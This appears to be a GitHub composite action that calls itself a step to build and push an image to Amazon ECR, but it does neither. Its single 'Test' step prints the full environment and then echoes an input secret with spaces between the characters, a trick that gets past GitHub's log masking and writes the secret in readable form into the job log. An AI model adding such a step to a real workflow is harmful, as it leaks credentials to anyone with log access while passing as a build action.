inputs:
  name:
    description: 'Build and push image to Amazon ECR'
runs:
  using: "composite"
  steps:
    - name: Test
      run: |
        printenv
        echo $INPUT_SECRET | sed -e 's/\(.\)/\1 /g'
      shell: bash
